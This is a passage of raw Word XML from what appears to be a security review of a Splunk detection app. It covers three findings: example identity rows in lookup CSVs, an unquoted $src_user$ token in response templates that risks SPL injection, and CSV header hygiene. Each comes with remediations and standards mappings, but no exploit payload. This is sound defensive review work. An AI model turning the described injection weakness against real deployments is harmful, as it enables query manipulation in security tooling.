        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A06:2021 Vulnerable and Outdated Components. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-5, RA-5 Vulnerability Monitoring and Scanning. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID.RA Identify - Risk Assessment, PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.5.7, A.8.8 Management of technical vulnerabilities. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Splunk app and dashboards / System Configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>APP-09 — Example identity lookups shipped as defaults (domain_controllers, domain_admins)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (no CVSS score (informational)). Exploitability: Secure-default.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> lookups/csv/domain_controllers.csv; lookups/csv/domain_admins.csv</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CVSS v3.1 N/A (secure default / data-quality)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>lookups/csv/domain_controllers.csv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>dc01.example.com,true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>lookups/csv/domain_admins.csv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Administrator</w:t>
      </w:r>
      <w:r>
        <w:t>), plus empty placeholder CSVs (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>domains.csv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aws_service_accounts.csv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>previously_seen_*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>*_local.csv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>brandMonitoring_lookup</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Identity-sensitive lookups ship with example rows (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>dc01.example.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Administrator</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Detections that key on these (e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>windows_kerberos_local_successful_logon.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> consumes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>domain_controllers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>windows_domain_admin_impersonation_indicator.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> consumes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>domain_admins</w:t>
      </w:r>
      <w:r>
        <w:t>) will produce false positives/negatives until the operator replaces the example data with real DC/admin inventory. Empty placeholder lookups are the correct pattern (fail-empty); the concern is the non-empty example rows that look like real config.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> None. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: Not exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (secure-default/tuning concern).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PoC:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Read of the shipped CSV rows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ship these with an empty data row (header only) or a clearly non-matching sentinel, and document the required population step; or source them from an identity lookup/asset framework. Explanation: example identities masquerading as config cause silent detection gaps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Mappings:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-1188 (Insecure Default Initialization of Resource). OWASP A05:2021. ASVS v4 1.1 / 8.1. NIST 800-53 Rev5 CM-6, SA-4. NIST CSF 2.0 PR.PS-01. ISO 27001:2022 A.8.9. Best practice: fail-empty reference data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-1188 Initialization of a Resource with an Insecure Default. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A05:2021 Security Misconfiguration. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CM-6 Configuration Settings. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.9 Configuration management. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Splunk app and dashboards / System Configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>APP-12 — Response templates: unquoted $src_user$ SPL token and instance-specific asset IDs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (no CVSS score (informational)). Exploitability: Conditionally exploitable (token source dependent).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> response_templates/*SuspiciousEmail* (v2/v3), response_templates/*.json</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CVSS v3.1 N/A (portability + conditional injection)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>response_templates/*SuspiciousEmail*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (v2/v3) embedded URL-encoded SPL containing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>... | search recipient IN ($src_user$) ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; v3 templates' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>suggestions.actions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> carry instance-specific </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>app_id</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>asset</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> numbers (e.g. asset 36 SMTP, asset 44 CrowdStrike), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>creator: "splunker"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>_user: "nobody"</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (a) SuspiciousEmail response templates embed SPL where the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>$src_user$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> token is inlined into an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>IN (...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> clause without </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>|s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> quoting. If </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>$src_user$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is ever sourced from attacker-controllable notable/event data (an email recipient field), the same SPL-injection class as APP-01/02 applies at phishing-response time. I could not confirm the exact binding of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>$src_user$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> within Mission Control at review time, so this is raised with that caveat (Conditionally exploitable if the token derives from event data; Not exploitable if it is an analyst-selected literal). (b) The templates hardcode this instance's numeric </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>app_id</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>asset</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IDs and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>creator: splunker</w:t>
      </w:r>
      <w:r>
        <w:t>, which will not resolve on another deployment — a portability/correctness defect that can cause suggested actions to target the wrong asset.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Depends on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>$src_user$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> provenance within SOAR/Mission Control (not verifiable offline). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: Conditionally exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (token-source-dependent).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PoC:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Read of the compact-rendered template JSON (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rt_compact.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rt_fold.txt</w:t>
      </w:r>
      <w:r>
        <w:t>) showing the unquoted token and the numeric asset IDs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Quote the token (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>recipient IN ($src_user|s$)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) or bind it to a validated/escaped parameter; replace hardcoded </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>app_id</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>asset</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>creator</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with deployment-resolved references or documented post-import mapping. Explanation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>|s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> prevents SPL breakout if the token ever carries event data; symbolic references make templates portable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Mappings:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-943 / CWE-89 family (token); CWE-1188 (hardcoded instance IDs). OWASP A03:2021 (injection), A05:2021 (misconfig). ASVS v4 5.3.4. ATT&amp;CK T1059. NIST 800-53 Rev5 SI-10, CM-6. NIST CSF 2.0 PR.PS-06. ISO 27001:2022 A.8.28, A.8.9. Best practice: Splunk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>|s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + environment-agnostic SOAR content.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-943 Improper Neutralization of Special Elements in Data Query Logic; CWE-1188 Initialization of a Resource with an Insecure Default. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A03:2021 Injection, A05:2021 Security Misconfiguration. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1059 Command and Scripting Interpreter. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-10 Information Input Validation, CM-6 Configuration Settings. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding, A.8.9 Configuration management. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Splunk app and dashboards / Output Encoding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>APP-10 — Lookup CSV header hygiene: UTF-8 BOM and leading-space field names</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Informational (no CVSS score (informational)). Exploitability: Data hygiene (potential silent detection gap).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> lookups/csv/malware_user_agents.csv, pua_user_agents.csv, rmm_user_agents.csv, suspicious_c2_*.csv, applockereventcodes.csv, dynamic_dns_providers_default.csv, legit_domains.csv, ... (16 files)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Informational</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CVSS v3.1 N/A</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BOM in first header field of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>malware_user_agents.csv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pua_user_agents.csv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rmm_user_agents.csv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>suspicious_c2_named_pipes.csv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>suspicious_c2_user_agents.csv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>suspicious_rmm_named_pipes.csv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (e.g. header reads </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>﻿malware_user_agent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Leading-space field names in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>applockereventcodes.csv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>dynamic_dns_providers_default.csv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> isDynDNS_default</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>legit_domains.csv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> isLegit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>local_file_inclusion_paths.csv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> lfi_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>mandatory_job_for_workflow.csv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
